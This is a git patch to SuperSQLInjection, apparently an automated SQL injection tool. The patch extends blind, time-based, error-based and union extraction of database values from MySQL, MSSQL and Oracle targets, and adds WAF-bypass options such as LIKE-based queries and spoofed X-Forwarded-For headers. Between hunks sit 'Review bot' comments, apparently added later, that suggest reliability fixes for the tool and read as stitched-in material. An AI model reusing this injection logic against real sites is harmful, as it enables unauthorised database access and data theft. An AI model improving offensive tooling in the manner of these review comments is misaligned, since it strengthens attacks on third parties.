From cf2c3990f23079268e7cf53ceaf0212930dc2dac Mon Sep 17 00:00:00 2001 From: shack2 <1341413415@qq.com> Date: Tue, 4 Dec 2018 23:30:51 +0800 Subject: [PATCH] update20181204 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 20181204 V1.0 正式版--- 优化注入配置文件,降低误报和漏报。 优化执行命令,文件读取模块解决部分情况无法执行命令或无法读取文件的情况。 修复SQLServer通过错误显示方式无法获取数据的情况。 优化部分代码。 增加自动识别注入记录,可将一个URL每一个参数存在的盲注、报错注入、Union注入都记录下来,可灵活选择对应的注入类型。 --- SuperSQLInjection/Main.Designer.cs | 194 ++++- SuperSQLInjection/Main.cs | 722 ++++++++---------- SuperSQLInjection/Main.resx | 347 ++++----- SuperSQLInjection/ShowResponse.cs | 11 + SuperSQLInjection/SuperSQLInjection.csproj | 6 +- SuperSQLInjection/model/Config.cs | 8 +- SuperSQLInjection/model/DBType.cs | 5 +- SuperSQLInjection/model/InjectLog.cs | 21 + SuperSQLInjection/model/ServerInfo.cs | 1 + SuperSQLInjection/payload/MSSQL.cs | 20 +- .../payload/{MySQL5.cs => MySQL.cs} | 2 +- SuperSQLInjection/tools/Tools.cs | 236 +++++- SuperSQLInjection/tools/http/HTTP.cs | 9 +- .../tools/http/model/HttpRequest.cs | 12 + .../tools/http/model/HttpResponse.cs | 11 + 15 files changed, 974 insertions(+), 631 deletions(-) create mode 100644 SuperSQLInjection/model/InjectLog.cs rename SuperSQLInjection/payload/{MySQL5.cs => MySQL.cs} (99%) create mode 100644 SuperSQLInjection/tools/http/model/HttpRequest.cs create mode 100644 SuperSQLInjection/tools/http/model/HttpResponse.cs
diff --git a/SuperSQLInjection/Main.Designer.cs b/SuperSQLInjection/Main.Designer.cs
index 465b013..70ab017 100644
--- a/SuperSQLInjection/Main.Designer.cs
+++ b/SuperSQLInjection/Main.Designer.cs
@@ -217,6 +217,7 @@ this.label18 = new System.Windows.Forms.Label(); this.label17 = new System.Windows.Forms.Label(); this.bypass_cbox_sendHTTPSleepTime = new System.Windows.Forms.ComboBox(); + this.bypass_chk_useLike = new System.Windows.Forms.CheckBox(); this.bypass_chk_usebetween = new System.Windows.Forms.CheckBox(); this.bypass_chk_use_unicode = new System.Windows.Forms.CheckBox(); this.bypass_hex = new System.Windows.Forms.CheckBox(); 
@@ -281,6 +282,20 @@ this.scanInjection_domainsCount = new System.Windows.Forms.Label(); this.scanInjection_scanedDomainCount = new System.Windows.Forms.Label(); this.label25 = new System.Windows.Forms.Label(); + this.tab_injectLog = new System.Windows.Forms.TabPage(); + this.lvw_injectLog = new System.Windows.Forms.ListView(); + this.injectlog_col_ip = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.injectlog_col_port = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.injectlog_col_uri = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.injectlog_col_pname = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.injectlog_col_injectType = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.injectlog_col_dbType = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.injectlog_col_payload = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.injectlog_col_time = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.injectLog_cm = new System.Windows.Forms.ContextMenuStrip(this.components); + this.tsmi_injectLog_useCLog = new System.Windows.Forms.ToolStripMenuItem(); + this.tsmi_injectLog_delSLog = new System.Windows.Forms.ToolStripMenuItem(); + this.tsmi_injectLog_clearAllLog = new System.Windows.Forms.ToolStripMenuItem(); this.statusStrip1 = new System.Windows.Forms.StatusStrip(); this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel(); this.status_lbl_time = new System.Windows.Forms.ToolStripStatusLabel(); 
@@ -367,6 +382,8 @@ this.scanInjectionURL_cms.SuspendLayout(); this.scanInjection_cms.SuspendLayout(); this.groupBox12.SuspendLayout(); + this.tab_injectLog.SuspendLayout(); + this.injectLog_cm.SuspendLayout(); this.statusStrip1.SuspendLayout(); this.SuspendLayout(); // @@ -2096,9 +2113,10 @@ this.mytab.Controls.Add(this.tab_bypass); this.mytab.Controls.Add(this.tab_encoding); this.mytab.Controls.Add(this.tab_scanInjection); + this.mytab.Controls.Add(this.tab_injectLog); this.mytab.Controls.Add(this.tab_logCenter); this.mytab.ImageList = this.myicon_list; - this.mytab.Location = new System.Drawing.Point(9, 120); + this.mytab.Location = new System.Drawing.Point(8, 120); this.mytab.Name = "mytab"; this.mytab.SelectedIndex = 0; this.mytab.Size = new System.Drawing.Size(840, 478); @@ -2208,6 +2226,7 @@ this.groupBox9.Controls.Add(this.label18); this.groupBox9.Controls.Add(this.label17); this.groupBox9.Controls.Add(this.bypass_cbox_sendHTTPSleepTime); + this.groupBox9.Controls.Add(this.bypass_chk_useLike); this.groupBox9.Controls.Add(this.bypass_chk_usebetween); this.groupBox9.Controls.Add(this.bypass_chk_use_unicode); this.groupBox9.Controls.Add(this.bypass_hex); @@ -2230,9 +2249,9 @@ // this.groupBox18.Controls.Add(this.bypass_btn_saveTemplate); this.groupBox18.Controls.Add(this.bypass_cbox_loadTemplate); - this.groupBox18.Location = new System.Drawing.Point(426, 177); + this.groupBox18.Location = new System.Drawing.Point(426, 173); this.groupBox18.Name = "groupBox18"; - this.groupBox18.Size = new System.Drawing.Size(371, 55); + this.groupBox18.Size = new System.Drawing.Size(383, 55); this.groupBox18.TabIndex = 25; this.groupBox18.TabStop = false; this.groupBox18.Text = "选择绕过模板"; 
@@ -2276,13 +2295,13 @@ this.cbox_base64Count.DropDownStyle = System.Windows.Forms.ComboBoxStyle.DropDownList; this.cbox_base64Count.FormattingEnabled = true; this.cbox_base64Count.Items.AddRange(new object[] { - "选择Base64编码", - "Base64编码一次", - "Base64编码二次", - "Base64编码三次"}); - this.cbox_base64Count.Location = new System.Drawing.Point(593, 130); + "选择", + "一次", + "二次", + "三次"}); + this.cbox_base64Count.Location = new System.Drawing.Point(507, 23); this.cbox_base64Count.Name = "cbox_base64Count"; - this.cbox_base64Count.Size = new System.Drawing.Size(216, 20); + this.cbox_base64Count.Size = new System.Drawing.Size(66, 20); this.cbox_base64Count.TabIndex = 22; this.cbox_base64Count.SelectedIndexChanged += new System.EventHandler(this.cbox_base64Count_SelectedIndexChanged); this.cbox_base64Count.TextChanged += new System.EventHandler(this.cbox_base64Count_TextChanged); @@ -2307,16 +2326,16 @@ "随机大小写", "关键字大写", "关键字小写"}); - this.cob_keyRepalce.Location = new System.Drawing.Point(671, 58); + this.cob_keyRepalce.Location = new System.Drawing.Point(680, 58); this.cob_keyRepalce.Name = "cob_keyRepalce"; - this.cob_keyRepalce.Size = new System.Drawing.Size(138, 20); + this.cob_keyRepalce.Size = new System.Drawing.Size(129, 20); this.cob_keyRepalce.TabIndex = 17; this.cob_keyRepalce.SelectedIndexChanged += new System.EventHandler(this.cob_keyRepalce_SelectedIndexChanged); // // label10 // this.label10.AutoSize = true; - this.label10.Location = new System.Drawing.Point(588, 61); + this.label10.Location = new System.Drawing.Point(595, 61); this.label10.Name = "label10"; this.label10.Size = new System.Drawing.Size(65, 12); this.label10.TabIndex = 16; 
@@ -2330,9 +2349,9 @@ "X-Forwarded-For", "Remote-Addr", "Client_Ip"}); - this.bypass_cbox_randIPToHeader.Location = new System.Drawing.Point(671, 93); + this.bypass_cbox_randIPToHeader.Location = new System.Drawing.Point(680, 94); this.bypass_cbox_randIPToHeader.Name = "bypass_cbox_randIPToHeader"; - this.bypass_cbox_randIPToHeader.Size = new System.Drawing.Size(138, 20); + this.bypass_cbox_randIPToHeader.Size = new System.Drawing.Size(129, 20); this.bypass_cbox_randIPToHeader.TabIndex = 14; this.bypass_cbox_randIPToHeader.TextChanged += new System.EventHandler(this.bypass_cbox_randIPToHeader_TextChanged); // @@ -2348,16 +2367,16 @@ // label31 // this.label31.AutoSize = true; - this.label31.Location = new System.Drawing.Point(427, 133); + this.label31.Location = new System.Drawing.Point(424, 27); this.label31.Name = "label31"; - this.label31.Size = new System.Drawing.Size(125, 12); + this.label31.Size = new System.Drawing.Size(77, 12); this.label31.TabIndex = 13; - this.label31.Text = "进行Base64编码处理:"; + this.label31.Text = "Base64编码:"; // // label18 // this.label18.AutoSize = true; - this.label18.Location = new System.Drawing.Point(588, 97); + this.label18.Location = new System.Drawing.Point(595, 97); this.label18.Name = "label18"; this.label18.Size = new System.Drawing.Size(65, 12); this.label18.TabIndex = 13; 
@@ -2396,16 +2415,27 @@ "8000", "9000", "10000"}); - this.bypass_cbox_sendHTTPSleepTime.Location = new System.Drawing.Point(494, 58); + this.bypass_cbox_sendHTTPSleepTime.Location = new System.Drawing.Point(507, 58); this.bypass_cbox_sendHTTPSleepTime.Name = "bypass_cbox_sendHTTPSleepTime"; - this.bypass_cbox_sendHTTPSleepTime.Size = new System.Drawing.Size(56, 20); + this.bypass_cbox_sendHTTPSleepTime.Size = new System.Drawing.Size(66, 20); this.bypass_cbox_sendHTTPSleepTime.TabIndex = 11; this.bypass_cbox_sendHTTPSleepTime.TextChanged += new System.EventHandler(this.bypass_cbox_sendHTTPSleepTime_TextChanged); // + // bypass_chk_useLike + // + this.bypass_chk_useLike.AutoSize = true; + this.bypass_chk_useLike.Location = new System.Drawing.Point(597, 131); + this.bypass_chk_useLike.Name = "bypass_chk_useLike"; + this.bypass_chk_useLike.Size = new System.Drawing.Size(144, 16); + this.bypass_chk_useLike.TabIndex = 3; + this.bypass_chk_useLike.Text = "使用like查询进行绕过"; + this.bypass_chk_useLike.UseVisualStyleBackColor = true; + this.bypass_chk_useLike.CheckedChanged += new System.EventHandler(this.bypass_chk_useLike_CheckedChanged); + // // bypass_chk_usebetween // this.bypass_chk_usebetween.AutoSize = true; - this.bypass_chk_usebetween.Location = new System.Drawing.Point(426, 96); + this.bypass_chk_usebetween.Location = new System.Drawing.Point(426, 131); this.bypass_chk_usebetween.Name = "bypass_chk_usebetween"; this.bypass_chk_usebetween.Size = new System.Drawing.Size(138, 16); this.bypass_chk_usebetween.TabIndex = 3; @@ -2416,7 +2446,7 @@ // bypass_chk_use_unicode // this.bypass_chk_use_unicode.AutoSize = true; - this.bypass_chk_use_unicode.Location = new System.Drawing.Point(671, 27); + this.bypass_chk_use_unicode.Location = new System.Drawing.Point(680, 27); this.bypass_chk_use_unicode.Name = "bypass_chk_use_unicode"; this.bypass_chk_use_unicode.Size = new System.Drawing.Size(138, 16); this.bypass_chk_use_unicode.TabIndex = 3; 
@@ -2427,7 +2457,7 @@ // bypass_hex // this.bypass_hex.AutoSize = true; - this.bypass_hex.Location = new System.Drawing.Point(590, 27); + this.bypass_hex.Location = new System.Drawing.Point(594, 25); this.bypass_hex.Name = "bypass_hex"; this.bypass_hex.Size = new System.Drawing.Size(66, 16); this.bypass_hex.TabIndex = 3; @@ -2438,7 +2468,7 @@ // bypass_chk_inculdeStr // this.bypass_chk_inculdeStr.AutoSize = true; - this.bypass_chk_inculdeStr.Location = new System.Drawing.Point(426, 26); + this.bypass_chk_inculdeStr.Location = new System.Drawing.Point(426, 96); this.bypass_chk_inculdeStr.Name = "bypass_chk_inculdeStr"; this.bypass_chk_inculdeStr.Size = new System.Drawing.Size(126, 16); this.bypass_chk_inculdeStr.TabIndex = 3; 
@@ -3031,6 +3061,105 @@ this.label25.TabIndex = 13; this.label25.Text = "已爬行:"; // + // tab_injectLog + // + this.tab_injectLog.Controls.Add(this.lvw_injectLog); + this.tab_injectLog.Location = new System.Drawing.Point(4, 23); + this.tab_injectLog.Name = "tab_injectLog"; + this.tab_injectLog.Padding = new System.Windows.Forms.Padding(3); + this.tab_injectLog.Size = new System.Drawing.Size(832, 451); + this.tab_injectLog.TabIndex = 10; + this.tab_injectLog.Text = "识别注入记录"; + this.tab_injectLog.UseVisualStyleBackColor = true; + // + // lvw_injectLog + // + this.lvw_injectLog.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] { + this.injectlog_col_ip, + this.injectlog_col_port, + this.injectlog_col_uri, + this.injectlog_col_pname, + this.injectlog_col_injectType, + this.injectlog_col_dbType, + this.injectlog_col_payload, + this.injectlog_col_time}); + this.lvw_injectLog.ContextMenuStrip = this.injectLog_cm; + this.lvw_injectLog.Dock = System.Windows.Forms.DockStyle.Fill; + this.lvw_injectLog.FullRowSelect = true; + this.lvw_injectLog.Location = new System.Drawing.Point(3, 3); + this.lvw_injectLog.Name = "lvw_injectLog"; + this.lvw_injectLog.Size = new System.Drawing.Size(826, 445); + this.lvw_injectLog.TabIndex = 1; + this.lvw_injectLog.UseCompatibleStateImageBehavior = false; + this.lvw_injectLog.View = System.Windows.Forms.View.Details; + // + // injectlog_col_ip + // + this.injectlog_col_ip.Text = "IP"; + // + // injectlog_col_port + // + this.injectlog_col_port.Text = "端口"; + // + // injectlog_col_uri + // + this.injectlog_col_uri.Text = "资源路径"; + // + // injectlog_col_pname + // + this.injectlog_col_pname.Text = "参数名称"; + this.injectlog_col_pname.Width = 82; + // + // injectlog_col_injectType + // + this.injectlog_col_injectType.Text = "注入类型"; + this.injectlog_col_injectType.Width = 71; + // + // injectlog_col_dbType + // + this.injectlog_col_dbType.Text = "数据库类型"; + this.injectlog_col_dbType.Width = 86; + // + // injectlog_col_payload + // + 
this.injectlog_col_payload.Text = "测试Payload"; + this.injectlog_col_payload.Width = 259; + // + // injectlog_col_time + // + this.injectlog_col_time.Text = "记录时间"; + this.injectlog_col_time.Width = 109; + // + // injectLog_cm + // + this.injectLog_cm.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.tsmi_injectLog_useCLog, + this.tsmi_injectLog_delSLog, + this.tsmi_injectLog_clearAllLog}); + this.injectLog_cm.Name = "contextMenuStrip1"; + this.injectLog_cm.Size = new System.Drawing.Size(185, 70); + // + // tsmi_injectLog_useCLog + // + this.tsmi_injectLog_useCLog.Name = "tsmi_injectLog_useCLog"; + this.tsmi_injectLog_useCLog.Size = new System.Drawing.Size(184, 22); + this.tsmi_injectLog_useCLog.Text = "选择此记录进行注入"; + this.tsmi_injectLog_useCLog.Click += new System.EventHandler(this.tsmi_injectLog_useCLog_Click); + // + // tsmi_injectLog_delSLog + // + this.tsmi_injectLog_delSLog.Name = "tsmi_injectLog_delSLog"; + this.tsmi_injectLog_delSLog.Size = new System.Drawing.Size(184, 22); + this.tsmi_injectLog_delSLog.Text = "删除选择记录"; + this.tsmi_injectLog_delSLog.Click += new System.EventHandler(this.tsmi_injectLog_delSLog_Click); + // + // tsmi_injectLog_clearAllLog + // + this.tsmi_injectLog_clearAllLog.Name = "tsmi_injectLog_clearAllLog"; + this.tsmi_injectLog_clearAllLog.Size = new System.Drawing.Size(184, 22); + this.tsmi_injectLog_clearAllLog.Text = "清空记录"; + this.tsmi_injectLog_clearAllLog.Click += new System.EventHandler(this.tsmi_injectLog_clearAllLog_Click); + // // statusStrip1 // this.statusStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] { @@ -3277,6 +3406,8 @@ this.scanInjection_cms.ResumeLayout(false); this.groupBox12.ResumeLayout(false); this.groupBox12.PerformLayout(); + this.tab_injectLog.ResumeLayout(false); + this.injectLog_cm.ResumeLayout(false); this.statusStrip1.ResumeLayout(false); this.statusStrip1.PerformLayout(); this.ResumeLayout(false); 
@@ -3557,6 +3688,21 @@ private System.Windows.Forms.ToolStripMenuItem data_dbs_tsmi_selectAllSubNode; private System.Windows.Forms.ToolStripMenuItem data_dbs_tsmi_selectReversSubNode; private System.Windows.Forms.RichTextBox txt_log; + private System.Windows.Forms.CheckBox bypass_chk_useLike; + private System.Windows.Forms.TabPage tab_injectLog; + private System.Windows.Forms.ListView lvw_injectLog; + private System.Windows.Forms.ColumnHeader injectlog_col_uri; + private System.Windows.Forms.ColumnHeader injectlog_col_pname; + private System.Windows.Forms.ColumnHeader injectlog_col_injectType; + private System.Windows.Forms.ColumnHeader injectlog_col_dbType; + private System.Windows.Forms.ColumnHeader injectlog_col_payload; + private System.Windows.Forms.ColumnHeader injectlog_col_time; + private System.Windows.Forms.ContextMenuStrip injectLog_cm; + private System.Windows.Forms.ToolStripMenuItem tsmi_injectLog_useCLog; + private System.Windows.Forms.ToolStripMenuItem tsmi_injectLog_delSLog; + private System.Windows.Forms.ToolStripMenuItem tsmi_injectLog_clearAllLog; + private System.Windows.Forms.ColumnHeader injectlog_col_ip; + private System.Windows.Forms.ColumnHeader injectlog_col_port; } } diff --git a/SuperSQLInjection/Main.cs b/SuperSQLInjection/Main.cs index e5f0b41..6d327c4 100644 --- a/SuperSQLInjection/Main.cs +++ b/SuperSQLInjection/Main.cs @@ -140,7 +140,19 @@ namespace SuperSQLInjection { new Thread(checkUpdate).Start(); } - + //加载注入日志记录 + Thread tt = new Thread(loadInjectLogs); + tt.Start(); + + } + public void loadInjectLogs() { + //加载注入日志记录 + List clist = Tools.readAllXmlFile(AppDomain.CurrentDomain.BaseDirectory + "/logs/injection/", null); + foreach (String path in clist) + { + Config config = XML.readConfig(path); + this.Invoke(new delegatelogInject(logInjectTolvw), config); + } } public void HttpDownloadFile(string url, string path) { 
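Review bot: loadInjectLogs calls `this.Invoke` from a worker thread without checking that the form's handle exists, and it parses every file under `logs/injection/` with `XML.readConfig` without a null check or a try/catch, so a single malformed or hand-edited record, or a form that is closed while loading, ends in an unhandled exception on that thread. The files are read back from disk at every start, so they should be handled as untrusted input; whether `XML.readConfig` disables DTD processing is not visible here and is worth confirming. The thread is also created without `IsBackground = true`, which keeps the process alive if loading stalls. The method that starts the thread begins outside the hunk; if it is the constructor, starting the thread from the form's Load handler instead avoids calling Invoke before the handle is created.

```csharp
Thread tt = new Thread(loadInjectLogs);
tt.IsBackground = true; // do not keep the process alive after the form closes
tt.Start();
// … unchanged: end of the enclosing method …
public void loadInjectLogs() {
    // … unchanged: Tools.readAllXmlFile call that fills clist …
    foreach (String path in clist)
    {
        if (this.IsDisposed || !this.IsHandleCreated)
        {
            return; // Invoke would throw without a live window handle
        }
        try
        {
            Config config = XML.readConfig(path);
            if (config != null)
            {
                this.Invoke(new delegatelogInject(logInjectTolvw), config);
            }
        }
        catch (Exception e)
        {
            // one unreadable record must not stop the remaining records from loading
            this.Invoke(new showLogDelegate(log), path + ": " + e.Message, LogLevel.info);
        }
    }
}
```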
@@ -218,7 +230,7 @@ namespace SuperSQLInjection return sid; } - public static int version = 20181119; + public static int version = 20181204; public static string versionURL = "http://www.shack2.org/soft/getNewVersion?ENNAME=SSuperSQLInjection&NO=" + URLEncode.UrlEncode(getSid()) + "&VERSION=" + version; //检查更新 public void checkUpdate() @@ -255,13 +267,12 @@ namespace SuperSQLInjection } else { - - MessageBox.Show("自动检查更新,没有发现新版本!"); + this.Invoke(new showLogDelegate(log), "自动检查更新,没有发现新版本!", LogLevel.info); } } catch (Exception e) { - MessageBox.Show("未发现新版本!"); + this.Invoke(new showLogDelegate(log), "更新异常!" + e.Message, LogLevel.info); } } @@ -297,22 +308,8 @@ namespace SuperSQLInjection MessageBox.Show("注入类型还未设置,您可以人工设置或点击自动识别!"); return false; } - - switch (this.cbox_basic_injectType.SelectedIndex) - { - case 0: - config.injectType = InjectType.UnKnow; - break; - case 1: - config.injectType = InjectType.Bool; - break; - case 2: - config.injectType = InjectType.Error; - break; - case 3: - config.injectType = InjectType.Union; - break; - } + config.injectType = (InjectType)this.cbox_basic_injectType.SelectedIndex; + if (DBType.UnKnow.Equals(config.dbType)) { @@ -320,29 +317,8 @@ namespace SuperSQLInjection return false; } - switch (this.cbox_basic_dbType.SelectedIndex) - { - case 0: - config.dbType = DBType.UnKnow; - break; - case 1: - config.dbType = DBType.Access; - break; - case 2: - config.dbType = DBType.MySQL5; - break; - case 3: - config.dbType = DBType.SQLServer; - break; - case 4: - config.dbType = DBType.Oracle; - break; - case 5: - config.dbType = DBType.MySQL4; - break; - } - - + config.dbType = (DBType)this.cbox_basic_dbType.SelectedIndex; + try { config.timeOut = int.Parse(this.cbox_basic_timeOut.Text); 
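Review bot: The new catch branch in checkUpdate reports a failed update check at `LogLevel.info` with only `e.Message`, so a network or parse failure reads like routine output and the stack trace is lost; if the LogLevel enum has an error member (not visible here), that is the level to use, with `e.ToString()` as the text. The check is sent to `versionURL`, which the context line of the preceding hunk builds with `http://` and the value of `getSid()`, so the answer is unauthenticated and the identifier travels in clear text. Switching that constant to an `https://` endpoint would cover both, and matters more if the response is later used to fetch a file (HttpDownloadFile exists in this class, but its caller is not in view). checkUpdate's body starts and ends outside the hunk.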
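Review bot: The cast `(InjectType)this.cbox_basic_injectType.SelectedIndex` accepts any integer, including the `-1` a ComboBox returns when nothing is selected, and stores a value that is not a member of the enum; the same applies to `(DBType)this.cbox_basic_dbType.SelectedIndex` in the following hunk. The removed switch statements left the field untouched for an unexpected index, so a guard such as `if (!Enum.IsDefined(typeof(InjectType), this.cbox_basic_injectType.SelectedIndex)) return false;` keeps that behaviour. The cast also ties the declaration order of both enums to the order of the combo box items: the old switch mapped index 5 to MySQL4 and index 2 to MySQL5, and this commit changes model/DBType.cs, which is not in view, so the two orders should be checked against each other and the dependency stated in a comment next to the cast. The enclosing method starts and ends outside both hunks.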
@@ -579,8 +555,8 @@ namespace SuperSQLInjection String[] sv = v.ToString().Split(':'); List column_list = new List(); column_list.Add(sv[1]); - String columns = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, column_list, null, null, -1); - String pay_load = MySQL5.union_value.Replace("{data}", columns); + String columns = MySQL.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, column_list, null, null, -1); + String pay_load = MySQL.union_value.Replace("{data}", columns); String result = getOneDataByUnionOrError(pay_load); this.Invoke(new setVariableDelegate(setVariable), sv[0], result); Interlocked.Increment(ref this.currentDataCount); @@ -611,8 +587,8 @@ namespace SuperSQLInjection String[] sv = v.ToString().Split(':'); List column_list = new List(); column_list.Add(sv[1]); - String columns = MySQL5.creatMySQLColumnsStrByError(column_list, null, null, -1); - String pay_load = MySQL5.error_value.Replace("{data}", columns); + String columns = MySQL.creatMySQLColumnsStrByError(column_list, null, null, -1); + String pay_load = MySQL.error_value.Replace("{data}", columns); String result = getOneDataByUnionOrError(pay_load); this.Invoke(new setVariableDelegate(setVariable), sv[0], result); Interlocked.Increment(ref this.currentDataCount); @@ -663,14 +639,13 @@ namespace SuperSQLInjection case DBType.Access: MessageBox.Show("报告大侠,Access数据库不支持此功能!"); break; - case DBType.MySQL4: break; - case DBType.MySQL5: - this.dataCount = MySQL5.vers.Count; - if (MySQL5.vers != null && MySQL5.vers.Count > 0) + case DBType.MySQL: + this.dataCount = MySQL.vers.Count; + if (MySQL.vers != null && MySQL.vers.Count > 0) { - for (int j = 0; j < MySQL5.vers.Count; j++) + for (int j = 0; j < MySQL.vers.Count; j++) { - String v = MySQL5.vers[j]; + String v = MySQL.vers[j]; //获取对应环境变量值 stp.QueueWorkItem(getVariablesByUnionByMySQL5, v); } 
@@ -727,17 +702,13 @@ namespace SuperSQLInjection case DBType.Access: MessageBox.Show("抱歉,Access数据库不支持错误显示方式注入!"); break; - - case DBType.MySQL4: - MessageBox.Show("抱歉,MySQL4以下版本不支持错误显示方式注入!"); - break; - case DBType.MySQL5: - this.dataCount = MySQL5.vers.Count; - if (MySQL5.vers != null && MySQL5.vers.Count > 0) + case DBType.MySQL: + this.dataCount = MySQL.vers.Count; + if (MySQL.vers != null && MySQL.vers.Count > 0) { - for (int j = 0; j < MySQL5.vers.Count; j++) + for (int j = 0; j < MySQL.vers.Count; j++) { - String v = MySQL5.vers[j]; + String v = MySQL.vers[j]; //获取对应环境变量值 stp.QueueWorkItem(getVariablesByErrorByMySQL5, v); } @@ -795,16 +766,13 @@ namespace SuperSQLInjection case DBType.Access: MessageBox.Show("报告大侠,Access数据库不支持此功能!"); break; - case DBType.MySQL4: - - break; - case DBType.MySQL5: - this.dataCount = MySQL5.vers.Count; - if (MySQL5.vers != null && MySQL5.vers.Count > 0) + case DBType.MySQL: + this.dataCount = MySQL.vers.Count; + if (MySQL.vers != null && MySQL.vers.Count > 0) { - for (int j = 0; j < MySQL5.vers.Count; j++) + for (int j = 0; j < MySQL.vers.Count; j++) { - String v = MySQL5.vers[j]; + String v = MySQL.vers[j]; //获取对应环境变量值 if (config.keyType.Equals(KeyType.Time)) { @@ -935,10 +903,10 @@ namespace SuperSQLInjection try { String[] vs = vers.ToString().Split(':'); - String payload_len = MySQL5.ver_length.Replace("{data}", vs[1]); + String payload_len = MySQL.ver_length.Replace("{data}", vs[1]); int len = getValueByStepUp(payload_len, 0, 10); - this.Invoke(new showLogDelegate(log), vs[0] + "长度为-----:" + len, LogLevel.info); - String va_payload = MySQL5.ver_value.Replace("{data}", vs[1]); + this.Invoke(new showLogDelegate(log), vs[0] + "长度为:" + len, LogLevel.info); + String va_payload = MySQL.ver_value.Replace("{data}", vs[1]); String value = ""; //获取值 for (int i = 1; i <= len; i++) 
@@ -947,7 +915,7 @@ namespace SuperSQLInjection int ascii = getValue(tmp_va_payload, 32, 126); value += ((char)ascii).ToString(); } - this.Invoke(new showLogDelegate(log), vs[0] + "值为-----:" + value, LogLevel.info); + this.Invoke(new showLogDelegate(log), vs[0] + "值为:" + value, LogLevel.info); this.Invoke(new setVariableDelegate(setVariable), vs[0], value); } @@ -965,11 +933,11 @@ namespace SuperSQLInjection { String[] vs = vers.ToString().Split(':'); - String payload_len = MySQL5.getBoolCountBySleep(MySQL5.bool_length, config.maxTime).Replace("{data}", vs[1]); + String payload_len = MySQL.getBoolCountBySleep(MySQL.bool_length, config.maxTime).Replace("{data}", vs[1]); int len = getValueByStepUp(payload_len, 0, 10); - this.Invoke(new showLogDelegate(log), vs[0] + "长度为-----:" + len, LogLevel.info); - String va_payload = MySQL5.getBoolCountBySleep(MySQL5.bool_value, config.maxTime).Replace("{data}", vs[1]); + this.Invoke(new showLogDelegate(log), vs[0] + "长度为:" + len, LogLevel.info); + String va_payload = MySQL.getBoolCountBySleep(MySQL.bool_value, config.maxTime).Replace("{data}", vs[1]); String value = ""; //获取值 for (int i = 1; i <= len; i++) @@ -978,7 +946,7 @@ namespace SuperSQLInjection int ascii = getValue(tmp_va_payload, 32, 126); value += ((char)ascii).ToString(); } - this.Invoke(new showLogDelegate(log), vs[0] + "值为-----:" + value, LogLevel.info); + this.Invoke(new showLogDelegate(log), vs[0] + "值为:" + value, LogLevel.info); this.Invoke(new setVariableDelegate(setVariable), vs[0], value); } 
@@ -1003,7 +971,7 @@ namespace SuperSQLInjection //判断变量长度 String payload_len = MSSQL.getBoolCountBySleep(MSSQL.bool_length, config.maxTime).Replace("{data}", vs[1]); int len = getValueByStepUp(payload_len, 0, 10); - this.Invoke(new showLogDelegate(log), vs[0] + "长度为-----:" + len, LogLevel.info); + this.Invoke(new showLogDelegate(log), vs[0] + "长度为:" + len, LogLevel.info); String va_payload = MSSQL.getBoolCountBySleep(MSSQL.bool_value, config.maxTime).Replace("{data}", vs[1]); String value = ""; //获取值 @@ -1017,7 +985,7 @@ namespace SuperSQLInjection value += Tools.unHexByUnicode(unicode, config.db_encoding); //设置值,这里由于是unicode值,需要转换 } - this.Invoke(new showLogDelegate(log), vs[0] + "值为-----:" + value,LogLevel.info); + this.Invoke(new showLogDelegate(log), vs[0] + "值为:" + value,LogLevel.info); this.Invoke(new setVariableDelegate(setVariable), vs[0], value); } 
@@ -1038,21 +1006,27 @@ namespace SuperSQLInjection String[] vs = vers.ToString().Split(':'); //判断变量长度 int len = getValueByStepUp(MSSQL.bool_length.Replace("{data}", vs[1]), 0, 10); - this.Invoke(new showLogDelegate(log), vs[0] + "长度为-----:" + len,LogLevel.info); + this.Invoke(new showLogDelegate(log), vs[0] + "长度为:" + len,LogLevel.info); String value = ""; - //获取值 - for (int i = 1; i <= len; i++) + if (config.useLike) { - - //select UNICODE(substring(@@version,{index},1)) - //取值payload,替换对应下标值 - String unicode_data_payload = MSSQL.nocast_unicode_value.Replace("{index}", i + "").Replace("{data}", vs[1] + ""); - int unicode = getValue(MSSQL.bool_value.Replace("{data}", unicode_data_payload), 32, 126); - - value += Tools.unHexByUnicode(unicode, config.db_encoding); - //设置值,这里由于是unicode值,需要转换 + value= getLikeValue(vs[1]); } - this.Invoke(new showLogDelegate(log), vs[0] + "值为-----:" + value, LogLevel.info); + else { + //获取值 + for (int i = 1; i <= len; i++) + { + + //select UNICODE(substring(@@version,{index},1)) + //取值payload,替换对应下标值 + String unicode_data_payload = MSSQL.nocast_unicode_value.Replace("{index}", i + "").Replace("{data}", vs[1] + ""); + int unicode = getValue(MSSQL.bool_value.Replace("{data}", unicode_data_payload), 32, 126); + + value += Tools.unHexByUnicode(unicode, config.db_encoding); + //设置值,这里由于是unicode值,需要转换 + } + } + this.Invoke(new showLogDelegate(log), vs[0] + "值为:" + value, LogLevel.info); this.Invoke(new setVariableDelegate(setVariable), vs[0], value); } @@ -1075,7 +1049,7 @@ namespace SuperSQLInjection String[] vs = vers.ToString().Split(':'); //判断变量长度 int len = getValueByStepUp(Oracle.bool_length.Replace("{data}", vs[1]), 0, 10); - this.Invoke(new showLogDelegate(log), vs[0] + "长度为-----:" + len, LogLevel.info); + this.Invoke(new showLogDelegate(log), vs[0] + "长度为:" + len, LogLevel.info); String va_payload = Oracle.bool_value.Replace("{data}", vs[1]); String value = ""; 
